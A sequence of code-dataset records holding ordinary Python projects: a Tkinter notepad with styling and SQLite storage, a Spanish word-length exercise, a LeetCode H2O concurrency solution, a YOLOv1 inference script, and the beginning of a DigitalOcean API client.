self.pad.bind(\r\n '', func=lambda x: self.toggler(italic=1))\r\n\r\n self.pad.bind(\r\n '', func=lambda x: self.toggler(underline=1))\r\n self.pad.bind(\r\n '', func=lambda x: self.toggler(underline=1))\r\n\r\n self.pad.bind('', func=lambda x: self.onclose())\r\n\r\n self.pad.bind('', func=lambda x: _show(\r\n 'About us', 'This My_Note is made by Suraj Kashyap.'))\r\n\r\n self.pad.bind(\r\n '', lambda x: self.Popup_Menu(x))\r\n\r\n self.pad.focus()\r\n \r\n # To Add style to particular region\r\n def set_style(self,bold=0,underline=0,italic=0,overstrike=0,regular=0):\r\n words = self.pad.selection_get()\r\n\r\n startindex = self.pad.search(words,INSERT)\r\n stopindex = f'{startindex.split(\".\")[0]}.{eval(startindex.split(\".\")[1])+len(words)}'\r\n\r\n if bold:\r\n self.current_bold_font = self.pad_font.copy()\r\n\r\n self.pad.tag_remove('Format_italic_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_underline_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_overstrike_text',startindex,stopindex)\r\n\r\n self.pad.tag_add('Format_bold_text',startindex,stopindex)\r\n self.current_bold_font.config(weight='bold')\r\n self.pad.tag_configure('Format_bold_text',font=self.current_bold_font)\r\n\r\n elif italic:\r\n self.pad.tag_remove('Format_bold_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_underline_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_overstrike_text',startindex,stopindex)\r\n\r\n self.current_italic_font = self.pad_font.copy()\r\n\r\n self.pad.tag_add('Format_italic_text',startindex,stopindex)\r\n self.current_italic_font.config(slant='italic')\r\n self.pad.tag_configure('Format_italic_text',font=self.current_italic_font)\r\n\r\n elif underline:\r\n self.pad.tag_remove('Format_bold_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_italic_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_overstrike_text',startindex,stopindex)\r\n \r\n self.current_underline_font = self.pad_font.copy()\r\n\r\n self.pad.tag_add('Format_underline_text',startindex,stopindex)\r\n self.current_underline_font.config(underline=1)\r\n self.pad.tag_configure('Format_underline_text',font=self.current_underline_font)\r\n \r\n elif overstrike:\r\n 
self.pad.tag_remove('Format_bold_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_italic_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_underline_text',startindex,stopindex)\r\n \r\n self.current_overstrike_font = self.pad_font.copy()\r\n\r\n self.pad.tag_add('Format_overstrike_text',startindex,stopindex)\r\n self.current_overstrike_font.config(overstrike=1)\r\n self.pad.tag_configure('Format_overstrike_text',font=self.current_overstrike_font)\r\n\r\n elif regular:\r\n self.pad.tag_remove('Format_bold_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_italic_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_underline_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_overstrike_text',startindex,stopindex)\r\n\r\n # Changing status of bold, italic, underline and regular (Function for Popup Menu)\r\n def popmenu_setter(self):\r\n try:\r\n words = self.pad.selection_get()\r\n startindex = self.pad.search(words,INSERT)\r\n except Exception:\r\n self.bold_status = DISABLED\r\n self.italic_status = DISABLED\r\n self.underline_status = DISABLED\r\n self.overstrike_status = DISABLED\r\n self.regular_status = DISABLED\r\n\r\n else:\r\n if 'Format_bold_text' in self.pad.tag_names(startindex):\r\n self.bold_status = DISABLED\r\n else:\r\n self.bold_status = NORMAL\r\n\r\n if 'Format_italic_text' in self.pad.tag_names(startindex):\r\n self.italic_status = DISABLED\r\n else:\r\n self.italic_status = NORMAL\r\n\r\n if 'Format_underline_text' in self.pad.tag_names(startindex):\r\n self.underline_status = DISABLED\r\n else:\r\n self.underline_status = NORMAL\r\n \r\n if 'Format_overstrike_text' in self.pad.tag_names(startindex):\r\n self.overstrike_status = DISABLED\r\n else:\r\n self.overstrike_status = NORMAL\r\n \r\n if self.overstrike_status == NORMAL and self.underline_status == NORMAL and self.italic_status == NORMAL and self.bold_status == NORMAL:\r\n self.regular_status=DISABLED\r\n else:\r\n self.regular_status=NORMAL\r\n\r\n # For Right Click Menu \r\n def Popup_Menu(self, event):\r\n popmenu = Menu(self.pad, tearoff=0)\r\n self.popmenu_setter()\r\n\r\n popmenu.add_command(label='Regular',command=lambda : self.set_style(regular=1),state=self.regular_status)\r\n\r\n popmenu.add_command(label='Bold',command=lambda : self.set_style(bold=1),state=self.bold_status)\r\n\r\n popmenu.add_command(label='Italic',command=lambda : self.set_style(italic=1),state=self.italic_status)\r\n\r\n popmenu.add_command(label='Underline',command=lambda : self.set_style(underline=1),state=self.underline_status)\r\n\r\n popmenu.add_command(label='Overstrike',command=lambda : self.set_style(overstrike=1),state=self.overstrike_status)\r\n\r\n popmenu.add_separator()\r\n popmenu.add_command(label='Clear All', command=lambda : self.pad.delete(1.0, END))\r\n popmenu.add_command(label='Change_Font', command=lambda :self.format(font=True))\r\n popmenu.add_command(label='Close', command=self.onclose)\r\n popmenu.post(event.x_root, event.y_root)\r\n\r\n # For Find function\r\n def searcher(self,word):\r\n self.startindex = self.pad.search(word, self.startindex,END,exact=self.exact,nocase=self.nocase)\r\n if self.startindex:\r\n self.stopindex = f'{self.startindex.split(\".\")[0]}.{eval(self.startindex.split(\".\")[1])+len(word)}'\r\n self.pad.see(self.startindex)\r\n self.pad.tag_remove('sel',1.0,END)\r\n self.pad.tag_add('sel',self.startindex,self.stopindex)\r\n self.startindex=self.stopindex\r\n else:\r\n self.pad.bell()\r\n self.startindex=1.0\r\n\r\n # For Replace 
function\r\n def delete(self,new_text,old_text,all=False):\r\n def search():\r\n try:\r\n self.startindex = self.pad.search(old_text, self.startindex,END,exact=self.exact,nocase=self.nocase)\r\n if self.startindex:\r\n self.stopindex = f'{self.startindex.split(\".\")[0]}.{eval(self.startindex.split(\".\")[1])+len(old_text)}'\r\n self.pad.see(self.startindex)\r\n self.pad.tag_remove('sel',1.0,END)\r\n self.pad.tag_add('sel',self.startindex,self.stopindex)\r\n except Exception:\r\n self.pad.bell()\r\n self.startindex = 1.0\r\n self.stopindex = 1.0\r\n \r\n search()\r\n if self.find_next_press:\r\n if all:\r\n n=len(str(self.pad.get(1.0,END)).split(old_text))-1\r\n else:\r\n n=1\r\n for i in range(n):\r\n if 'sel' in self.pad.tag_names(self.startindex):\r\n self.pad.delete(self.startindex,self.stopindex)\r\n self.pad.insert(self.startindex,new_text)\r\n self.startindex = self.stopindex\r\n search()\r\n \r\n self.find_next_press = True\r\n\r\n # For Goto function\r\n def go(self,line):\r\n self.pad.see(line+'.0')\r\n self.pad.tag_remove('sel',1.0,END)\r\n self.pad.tag_add('sel',f'{line}.end')\r\n if eval(self.pad.index(END))-1>'))\r\n Edit_Menu.add_command(label='Copy Ctrl+C',\r\n command=lambda: self.pad.event_generate('<>'))\r\n Edit_Menu.add_command(label='Paste Ctrl+V',\r\n command=lambda: self.pad.event_generate('<>'))\r\n Edit_Menu.add_command(label='Select All Ctrl+A',\r\n command=lambda: self.pad.tag_add('sel',1.0,END))\r\n Edit_Menu.add_separator()\r\n\r\n Edit_Menu.add_command(label='Find Ctrl+F',command=self.find_words)\r\n Edit_Menu.add_command(label='Replace Ctrl+H',command=lambda :self.find_words('replace'))\r\n Edit_Menu.add_command(label='Go To Ctrl+G',command=lambda :self.find_words('goto'))\r\n\r\n\r\n Edit_Menu.add_separator()\r\n\r\n Edit_Menu.add_command(label='Close', command=self.destroy)\r\n return Edit_Menu\r\n\r\n # Font Menu\r\n def Font_style_setter(self):\r\n\r\n Font_style_Menu = Menu(self, tearoff=0)\r\n Font_style_Menu.add_command(\r\n label='Regular', command=self.regular_setter)\r\n Font_style_Menu.add_checkbutton(\r\n variable=self.Bold, label='Bold', command=self.format)\r\n Font_style_Menu.add_checkbutton(\r\n variable=self.Italic, label='Italic', command=self.format)\r\n Font_style_Menu.add_checkbutton(\r\n variable=self.Underline, label='Underline', command=self.format)\r\n Font_style_Menu.add_separator()\r\n Font_style_Menu.add_checkbutton(\r\n variable=self.Wrap, label='Wrap Text', command=self.format)\r\n Font_style_Menu.add_command(\r\n label='Format', command=lambda: self.format(True))\r\n\r\n return Font_style_Menu\r\n\r\n # Help Menu\r\n def Help_Menu_setter(self):\r\n Help_Menu = Menu(self, tearoff=0)\r\n Help_Menu.add_command(label='About One_Note F1', command=lambda: _show(\r\n 'About us', 'This MyNote is made by Suraj Kashyap.'))\r\n\r\n return Help_Menu\r\n\r\n # Update Status bar \r\n def status_bar_setter(self, status_widget, status):\r\n status_widget[0].configure(text=status)\r\n status_widget[1].configure(text=f\"Line : {self.pad.index(INSERT).split('.')[0]} Char : {self.pad.index(INSERT).split('.')[1]}\")\r\n self.issaved=False\r\n self.title_set()\r\n \r\n\r\nclass Database():\r\n def __init__(self,file_name):\r\n self.connection = connect(f'Data\\\\{file_name}.db')\r\n self.db = self.connection.cursor()\r\n try: \r\n self.db.execute(\"\"\"\r\n CREATE TABLE MASTER(\r\n Startindex text,\r\n Stopindex text,\r\n Format text\r\n )\r\n \"\"\")\r\n self.connection.commit()\r\n except Exception:\r\n pass\r\n\r\n def 
Insert_data(self,startindex,stopindex,format):\r\n with self.connection:\r\n self.db.execute('INSERT INTO MASTER VALUES((:start),(:stop),(:style))',{'start':startindex,'stop':stopindex,'style':format})\r\n\r\n def Select_data(self):\r\n with self.connection:\r\n self.db.execute('SELECT * FROM MASTER')\r\n return self.db.fetchall()\r\n \r\n def clear(self):\r\n with self.connection:\r\n self.db.execute('DELETE FROM MASTER')\r\n\r\n\r\n# Main Function\r\ndef main(MyNote, text='',func=print):\r\n MyNote.window_set(700, 500, 500, 300)\r\n status_widget = MyNote.Text_widget_and_scrollbar()\r\n MyNote.inserter(text)\r\n\r\n MyNote.configure_pad(status_widget)\r\n\r\n # Making Menubar\r\n mymenu = Menu(MyNote)\r\n File_Menu = MyNote.File_Menu_setter()\r\n mymenu.add_cascade(menu=File_Menu, label='File')\r\n\r\n Edit_Menu = MyNote.Edit_Menu_setter()\r\n mymenu.add_cascade(menu=Edit_Menu, label='Edit')\r\n\r\n Font_style_Menu = MyNote.Font_style_setter()\r\n mymenu.add_cascade(menu=Font_style_Menu, label='Font_style')\r\n\r\n Help_Menu = MyNote.Help_Menu_setter()\r\n mymenu.add_cascade(menu=Help_Menu, label='Help')\r\n\r\n MyNote.configure(menu=mymenu)\r\n func()\r\n # Running loop\r\n MyNote.mainloop()\r\n # exit()\r\n\r\n# Main\r\n\r\nsystem('mkdir .\\Data')\r\nMyNote = My_Note()\r\nmain(MyNote)\r\n\r\n","repo_name":"imsuraj675/MyNote","sub_path":"My_Note.py","file_name":"My_Note.py","file_ext":"py","file_size_in_byte":31346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17785715919","text":"# Crear una función que reciba un texto y devuelva una lista con las palabras que contienen entre 3 y 6 caracteres de largo\n\n\ndef palabras_entre_3_y_6_caracteres(texto):\n # Dividimos el texto en palabras\n palabras = texto.split()\n\n # Utilizamos una comprensión de lista para filtrar las palabras con 3 a 6 caracteres\n palabras_filtradas = [palabra for palabra in palabras if 3 <= len(palabra) <= 6]\n\n return palabras_filtradas\n\n\n# Ejemplo de uso:\ntexto = \"Esta es una frase de ejemplo con palabras cortas y largas\"\nresultado = palabras_entre_3_y_6_caracteres(texto)\nprint(resultado) # Debería devolver ['una', 'frase', 'con', 'y']\n","repo_name":"KevinPlucci/LABO-1-Python","sub_path":"GUIA/REGEX/eje9.py","file_name":"eje9.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"10741388709","text":"\"\"\"\n1117.H2O生成\n现在有两种线程,氧 oxygen 和氢 hydrogen,你的目标是组织这两种线程来产生水分子。\n\n存在一个屏障(barrier)使得每个线程必须等候直到一个完整水分子能够被产生出来。\n\n氢和氧线程会被分别给予 releaseHydrogen 和 releaseOxygen 方法来允许它们突破屏障。\n\n这些线程应该三三成组突破屏障并能立即组合产生一个水分子。\n\n你必须保证产生一个水分子所需线程的结合必须发生在下一个水分子产生之前。\n\n换句话说:\n如果一个氧线程到达屏障时没有氢线程到达,它必须等候直到两个氢线程到达。\n如果一个氢线程到达屏障时没有其它线程到达,它必须等候直到一个氧线程和另一个氢线程到达。\n书写满足这些限制条件的氢、氧线程同步代码。\n\n示例 1:\n输入: \"HOH\"\n输出: \"HHO\"\n解释: \"HOH\" 和 \"OHH\" 依然都是有效解。\n\n示例 2:\n输入: \"OOHHHH\"\n输出: \"HHOHHO\"\n解释: \"HOHHHO\", \"OHHHHO\", \"HHOHOH\", \"HOHHOH\", \"OHHHOH\", \"HHOOHH\", \"HOHOHH\" 和 \"OHHOHH\" 依然都是有效解。\n\n提示:\n输入字符串的总长将会是 3n, 1 ≤n≤ 50;\n输入字符串中的 “H” 总数将会是 2n 。\n输入字符串中的 “O” 总数将会是 n 。\n\"\"\"\nfrom typing import Callable\nfrom threading import Lock, Thread\nimport time\nimport threading\n\n\nclass H2O(object):\n def __init__(self):\n self.O = threading.Semaphore(1)\n self.H = threading.Semaphore(2)\n self.H_num = 0\n\n def hydrogen(self, releaseHydrogen):\n \"\"\"\n :type releaseHydrogen: method\n :rtype: void\n \"\"\"\n\n # releaseHydrogen() outputs \"H\". 
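The eje9.py record above sits in a REGEX exercise folder but solves the problem with `split` and a list comprehension. The equivalent regular expression is a one-liner; a sketch (`\w` is Unicode-aware in Python 3, so accented Spanish letters count as word characters):

import re

def palabras_entre_3_y_6(texto):
    # \b\w{3,6}\b matches whole words of three to six word characters
    return re.findall(r'\b\w{3,6}\b', texto)

texto = "Esta es una frase de ejemplo con palabras cortas y largas"
print(palabras_entre_3_y_6(texto))
# -> ['Esta', 'una', 'frase', 'con', 'cortas', 'largas'], the same list the
#    split-based filter produces (the record's expected-output comment is off).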
Do not change or remove this line.\n self.H.acquire()\n releaseHydrogen()\n\n self.H_num += 1\n if self.H_num > 1:\n self.H_num -= 2\n self.O.release()\n\n def oxygen(self, releaseOxygen):\n \"\"\"\n :type releaseOxygen: method\n :rtype: void\n \"\"\"\n\n # releaseOxygen() outputs \"O\". Do not change or remove this line.\n self.O.acquire()\n releaseOxygen()\n self.H.release()\n self.H.release()\n\n\nclass H2O1:\n def __init__(self):\n self.h = 0\n self.o = 0\n self.h2o_thread = Thread(target=self.h2o, args=())\n self.h2o_thread.setDaemon(True)\n self.h2o_thread.start()\n self.h_lock = Lock()\n self.o_lock = Lock()\n self.hl = Lock()\n self.ol = Lock()\n pass\n\n def h2o(self):\n while True:\n if self.h >= 2 and self.o >= 1:\n self.h -= 2\n self.o -= 1\n time.sleep(0.01)\n\n def hydrogen(self, releaseHydrogen: 'Callable[[], None]') -> None:\n self.h_lock.acquire()\n while self.h >= 2:\n time.sleep(0.01)\n # releaseHydrogen() outputs \"H\". Do not change or remove this line.\n releaseHydrogen()\n self.h += 1\n self.h_lock.release()\n\n def oxygen(self, releaseOxygen: 'Callable[[], None]') -> None:\n self.o_lock.acquire()\n while self.o >= 1:\n time.sleep(0.01)\n # releaseOxygen() outputs \"O\". Do not change or remove this line.\n releaseOxygen()\n self.o += 1\n self.o_lock.release()\n\n","repo_name":"GeorgeDaiz/my_python","sub_path":"Leetcode/Concurrency/1117.building-h2o.py","file_name":"1117.building-h2o.py","file_ext":"py","file_size_in_byte":3285,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9739232058","text":"import torch\nfrom torch import nn\nimport torch.utils.data\nimport torchvision\nimport numpy as np\nimport pickle,os\nfrom dataset import *\nfrom loss import *\nfrom network import *\nimport transforms\n# from torchvision import transforms\nimport cv2\n# from boxes import batched_nms\nfrom py_cpu_nms import py_cpu_nms\n\n_GRAY = (218, 227, 218)\n_GREEN = (18, 127, 15)\n_RED = (20, 50, 255)\n\nclasses=[\"__background__\",\"person\"]\n\ndef apply_nms(prediction,conf_thres=0.8,nms_thres=0.4,filter_labels=[],device=\"cpu\"):\n # for idx,prediction in enumerate(detections):\n # 1.先按scores过滤分数低的,过滤掉分数小于conf_thres\n ms = prediction[\"scores\"] > conf_thres\n if torch.sum(ms) == 0:\n return None\n else:\n last_scores = []\n last_labels = []\n last_boxes = []\n\n # 2.类别一样的按nms过滤,如果Iou大于nms_thres,保留分数最大的,否则都保留\n # 按阈值过滤\n scores = prediction[\"scores\"][ms]\n labels = prediction[\"labels\"][ms]\n boxes = prediction[\"boxes\"][ms]\n unique_labels = labels.unique()\n for c in unique_labels:\n if c in filter_labels:continue\n\n # Get the detections with the particular class\n temp = labels == c\n _scores = scores[temp]\n _labels = labels[temp]\n _boxes = boxes[temp]\n if len(_labels) > 1:\n # Sort the detections by maximum objectness confidence\n # _, conf_sort_index = torch.sort(_scores, descending=True)\n # _scores=_scores[conf_sort_index]\n # _boxes=_boxes[conf_sort_index]\n\n # \"\"\"\n keep=py_cpu_nms(_boxes.cpu().numpy(),_scores.cpu().numpy(),nms_thres)\n # keep = nms(_boxes, _scores, nms_thres)\n # keep = batched_nms(_boxes, _scores,_labels, nms_thres)\n last_scores.extend(_scores[keep])\n last_labels.extend(_labels[keep])\n last_boxes.extend(_boxes[keep])\n\n else:\n last_scores.extend(_scores)\n last_labels.extend(_labels)\n last_boxes.extend(_boxes)\n\n return {\"scores\": last_scores, \"labels\": last_labels, \"boxes\": last_boxes}\n\ndef vis_class(img, pos, class_str, font_scale=0.35):\n \"\"\"Visualizes the 
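In the first `H2O` solution above, `self.O` starts at 1 while `self.H` starts at 2, so two hydrogens can print, bump the oxygen semaphore to 2, and let two oxygens print against a single H pair (e.g. `HHOO`). Starting the oxygen semaphore at 0 closes that hole; alternatively, `threading.Barrier(3)` expresses the "complete molecule" condition directly. A sketch of the barrier variant (class name is ours):

import threading

class H2OBarrier:
    def __init__(self):
        self.h_sem = threading.Semaphore(2)   # at most 2 H per molecule
        self.o_sem = threading.Semaphore(1)   # at most 1 O per molecule
        self.barrier = threading.Barrier(3)   # trips once the trio is complete

    def hydrogen(self, releaseHydrogen):
        with self.h_sem:
            self.barrier.wait()
            releaseHydrogen()   # permit returned only after printing

    def oxygen(self, releaseOxygen):
        with self.o_sem:
            self.barrier.wait()
            releaseOxygen()

Because each permit is released only after its holder has printed, the barrier for the next molecule cannot trip until the current trio has fully emitted, keeping every window of three characters at two H and one O.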
class.\"\"\"\n # temp_GREEN=np.clip(np.asarray(_GREEN)*label,0,255).astype(np.uint8).tolist()\n\n x0, y0 = int(pos[0]), int(pos[1])\n # Compute text size.\n txt = class_str\n font = cv2.FONT_HERSHEY_SIMPLEX\n ((txt_w, txt_h), _) = cv2.getTextSize(txt, font, font_scale, 1)\n # Place text background.\n back_tl = x0, y0 - int(1.2 * txt_h)\n back_br = x0 + txt_w, y0\n cv2.rectangle(img, back_tl, back_br, _GREEN, -1) # _GREEN\n # Show text.\n txt_tl = x0, y0 - int(0.2 * txt_h)\n cv2.putText(img, txt, txt_tl, font, font_scale, _GRAY, lineType=cv2.LINE_AA)\n cv2.rectangle(img,(pos[0],pos[1]),(pos[2],pos[3]),_GREEN,2) # _GREEN\n return img\n\ndef draw_rect(image,pred,scale_factor):\n labels = pred[\"labels\"]\n bboxs = pred[\"boxes\"]\n scores = pred[\"scores\"]\n h,w,size=scale_factor\n\n for label,bbox,score in zip(labels,bboxs,scores):\n label=label.cpu().numpy()\n bbox=bbox.cpu().numpy()#.astype(np.int16)\n score=score.cpu().numpy()\n class_str=\"%s:%.3f\"%(classes[int(label)],score) # 跳过背景\n # pos=list(map(lambda x:int(x/scale_factor),bbox))\n if h>=w:\n bbox = bbox*h / size\n diff = h - w\n bbox[0]-= diff // 2\n bbox[2]-= diff // 2\n else:\n bbox = bbox * w / size\n diff = w - h\n bbox[1] -= diff // 2\n bbox[3] -= diff // 2\n\n pos = list(map(int, bbox))\n\n image=vis_class(image,pos,class_str,0.5)\n return image\n\nclass YOLOV1Infer(nn.Module):\n def __init__(self,root:str):\n super(YOLOV1Infer,self).__init__()\n self.batch_size = 1\n # root = \"\"\n seed = 100\n resize = 416\n self.num_classes = 1 # 不包含背景\n self.num_anchors = 2 # 2个box\n self.use_cuda = torch.cuda.is_available()\n self.device = torch.device(\"cuda\" if self.use_cuda else \"cpu\")\n torch.manual_seed(seed)\n kwargs = {'num_workers': 5, 'pin_memory': True} if self.use_cuda else {}\n self.save_model = \"./models/model.pt\"\n\n trainDataset = InferDataset(root, transforms=transforms.Compose(\n [\n # transforms.Resize((resize, resize)),\n # transforms.ToTensor(),\n # transforms.Normalize([0.485, 0.456, 0.406],[0.229, 0.224, 0.225])\n transforms.ToTensor(),\n Resize_fixed(resize, training=False)\n ]\n ))\n\n self.data_loader = torch.utils.data.DataLoader(\n trainDataset,\n batch_size=self.batch_size, shuffle=False,\n **kwargs\n )\n\n # self.network = YOLOV1Net(self.num_classes, \"resnet18\", 512, True, 0.5)\n self.network = YOLOV1Net(self.num_classes, \"resnet50\", 2048, True, 0.5)\n\n if self.use_cuda:\n self.network.to(self.device)\n self.loss_func = YOLOv1Loss(self.device, self.num_anchors, self.num_classes)\n\n self.network.load_state_dict(torch.load(self.save_model))\n\n self.conf_thres = 0.7\n self.nms_thres = 0.4\n self.image_mean = [0.485, 0.456, 0.406]\n self.image_std = [0.229, 0.224, 0.225]\n\n def renormalize(self, image):\n dtype, device = image.dtype, image.device\n mean = torch.as_tensor(self.image_mean, dtype=dtype, device=device)\n std = torch.as_tensor(self.image_std, dtype=dtype, device=device)\n # return (image - mean[:, None, None]) / std[:, None, None]\n return (image *std[None,:, None, None])+mean[None,:, None, None]\n\n def forward(self):\n self.network.eval()\n with torch.no_grad():\n for idx, (data,path,origin_img) in enumerate(self.data_loader):\n if self.use_cuda:\n data = data.to(self.device)\n\n output = self.network(data)\n detections = self.loss_func(output)\n\n if len(detections) > 0:\n _detections = apply_nms(detections[0], self.conf_thres, self.nms_thres, device=self.device, filter_labels=[])\n if _detections is None: continue\n\n image = origin_img[0].cpu().numpy()\n image = 
image.astype(np.uint8)#.transpose([1, 2, 0])\n # print(\"===========\",image.shape,\"====================\")\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n scale_factor = [image.shape[0],image.shape[1],data.size(2)]\n image = draw_rect(image, _detections, scale_factor)\n\n # save\n newPath = path[0].replace(\"PNGImages\",\"result\")\n if not os.path.exists(os.path.dirname(newPath)):os.makedirs(os.path.dirname(newPath))\n cv2.imwrite(newPath,image)\n\n # cv2.imshow(\"test\", image)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\nif __name__==\"__main__\":\n model = YOLOV1Infer(\"../valid/PNGImages\")\n model()","repo_name":"wucng/MLAndDL","sub_path":"DL/yolo/YOLOV1/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":7264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17412949232","text":"#!/usr/bin/env python\n#coding: utf-8\n\"\"\"\nThis module simply sends request to the Digital Ocean API,\nand returns their response as a dict.\n\"\"\"\n\nimport requests\nimport json as json_module\nfrom six import wraps\n\nAPI_ENDPOINT = 'https://api.digitalocean.com'\n\nclass DoError(RuntimeError):\n pass\n\n\ndef paginated(func):\n @wraps(func)\n def wrapper(self, url, headers=None, params=None, method='GET'):\n if method != 'GET':\n return func(self, url, headers, params, method)\n\n nxt = url\n out = {}\n\n while nxt is not None:\n result = func(self, nxt, headers, params, 'GET')\n nxt = None\n\n if isinstance(result, dict):\n for key, value in result.items():\n if key in out and isinstance(out[key], list):\n out[key].extend(value)\n else:\n out[key] = value\n\n if 'links' in result \\\n and 'pages' in result['links'] \\\n and 'next' in result['links']['pages']:\n nxt = result['links']['pages']['next']\n\n return out\n return wrapper\n\n\nclass DoManager(object):\n def __init__(self, client_id, api_key, api_version=1):\n self.api_endpoint = API_ENDPOINT\n self.client_id = client_id\n self.api_key = api_key\n self.api_version = int(api_version)\n\n if self.api_version == 2:\n self.api_endpoint += '/v2'\n if self.api_version == 1:\n self.api_endpoint += '/v1'\n\n def all_active_droplets(self):\n json = self.request('/droplets/')\n if self.api_version == 2:\n for index in range(len(json['droplets'])):\n self.populate_droplet_ips(json['droplets'][index])\n return json['droplets']\n\n def new_droplet(self, name, size_id, image_id, region_id,\n ssh_key_ids=None, virtio=True, private_networking=False,\n backups_enabled=False, user_data=None, ipv6=False):\n\n if self.api_version == 2:\n params = {\n 'name': str(name),\n 'size': str(size_id),\n 'image': str(image_id),\n 'region': str(region_id),\n 'virtio': str(virtio).lower(),\n 'ipv6': str(ipv6).lower(),\n 'private_networking': str(private_networking).lower(),\n 'backups': str(backups_enabled).lower(),\n }\n if ssh_key_ids:\n # Need to be an array in v2\n if isinstance(ssh_key_ids, basestring):\n ssh_key_ids = [ssh_key_ids]\n\n if type(ssh_key_ids) == list:\n for index in range(len(ssh_key_ids)):\n ssh_key_ids[index] = str(ssh_key_ids[index])\n\n params['ssh_keys'] = ssh_key_ids\n\n if user_data:\n params['user_data'] = user_data\n\n json = self.request('/droplets', params=params, method='POST')\n created_id = json['droplet']['id']\n json = self.show_droplet(created_id)\n return json\n else:\n params = {\n 'name': str(name),\n 'size_id': str(size_id),\n 'image_id': str(image_id),\n 'region_id': str(region_id),\n 'virtio': str(virtio).lower(),\n 
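`apply_nms` in the inference record above delegates to `py_cpu_nms(boxes, scores, thresh)`. For readers without that module, greedy IoU suppression fits in a few NumPy lines; a sketch with the same call shape (the classic Fast R-CNN version additionally adds +1 to widths and heights for integer pixel grids):

import numpy as np

def nms_sketch(boxes, scores, thresh):
    """Greedy NMS over [x1, y1, x2, y2] boxes; returns kept indices."""
    x1, y1, x2, y2 = boxes.T
    areas = (x2 - x1) * (y2 - y1)
    order = scores.argsort()[::-1]               # best score first
    keep = []
    while order.size > 0:
        i = order[0]
        keep.append(int(i))
        # Overlap of the winning box with every remaining candidate
        xx1 = np.maximum(x1[i], x1[order[1:]])
        yy1 = np.maximum(y1[i], y1[order[1:]])
        xx2 = np.minimum(x2[i], x2[order[1:]])
        yy2 = np.minimum(y2[i], y2[order[1:]])
        inter = np.clip(xx2 - xx1, 0, None) * np.clip(yy2 - yy1, 0, None)
        iou = inter / (areas[i] + areas[order[1:]] - inter)
        order = order[1:][iou <= thresh]         # suppress heavy overlaps
    return keep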
'private_networking': str(private_networking).lower(),\n 'backups_enabled': str(backups_enabled).lower(),\n }\n if ssh_key_ids:\n # Need to be a comma separated string\n if type(ssh_key_ids) == list:\n ssh_key_ids = ','.join(ssh_key_ids)\n params['ssh_key_ids'] = ssh_key_ids\n\n json = self.request('/droplets/new', params=params)\n return json['droplet']\n\n def show_droplet(self, droplet_id):\n json = self.request('/droplets/%s' % droplet_id)\n if self.api_version == 2:\n self.populate_droplet_ips(json['droplet'])\n return json['droplet']\n\n def droplet_v2_action(self, droplet_id, droplet_type, params=None):\n if params is None:\n params = {}\n params['type'] = droplet_type\n json = self.request('/droplets/%s/actions' % droplet_id, params=params, method='POST')\n return json\n\n def reboot_droplet(self, droplet_id):\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'reboot')\n else:\n json = self.request('/droplets/%s/reboot/' % droplet_id)\n json.pop('status', None)\n return json\n\n def power_cycle_droplet(self, droplet_id):\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'power_cycle')\n else:\n json = self.request('/droplets/%s/power_cycle/' % droplet_id)\n json.pop('status', None)\n return json\n\n def shutdown_droplet(self, droplet_id):\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'shutdown')\n else:\n json = self.request('/droplets/%s/shutdown/' % droplet_id)\n json.pop('status', None)\n return json\n\n def power_off_droplet(self, droplet_id):\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'power_off')\n else:\n json = self.request('/droplets/%s/power_off/' % droplet_id)\n json.pop('status', None)\n return json\n\n def power_on_droplet(self, droplet_id):\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'power_on')\n else:\n json = self.request('/droplets/%s/power_on/' % droplet_id)\n json.pop('status', None)\n return json\n\n def password_reset_droplet(self, droplet_id):\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'password_reset')\n else:\n json = self.request('/droplets/%s/password_reset/' % droplet_id)\n json.pop('status', None)\n return json\n\n def resize_droplet(self, droplet_id, size_id):\n if self.api_version == 2:\n params = {'size': size_id}\n json = self.droplet_v2_action(droplet_id, 'resize', params)\n else:\n params = {'size_id': size_id}\n json = self.request('/droplets/%s/resize/' % droplet_id, params)\n json.pop('status', None)\n return json\n\n def snapshot_droplet(self, droplet_id, name):\n params = {'name': name}\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'snapshot', params)\n else:\n json = self.request('/droplets/%s/snapshot/' % droplet_id, params)\n json.pop('status', None)\n return json\n\n def restore_droplet(self, droplet_id, image_id):\n if self.api_version == 2:\n params = {'image': image_id}\n json = self.droplet_v2_action(droplet_id, 'restore', params)\n else:\n params = {'image_id': image_id}\n json = self.request('/droplets/%s/restore/' % droplet_id, params)\n json.pop('status', None)\n return json\n\n def rebuild_droplet(self, droplet_id, image_id):\n if self.api_version == 2:\n params = {'image': image_id}\n json = self.droplet_v2_action(droplet_id, 'rebuild', params)\n else:\n params = {'image_id': image_id}\n json = self.request('/droplets/%s/rebuild/' % droplet_id, params)\n json.pop('status', None)\n return json\n\n def enable_backups_droplet(self, droplet_id):\n if 
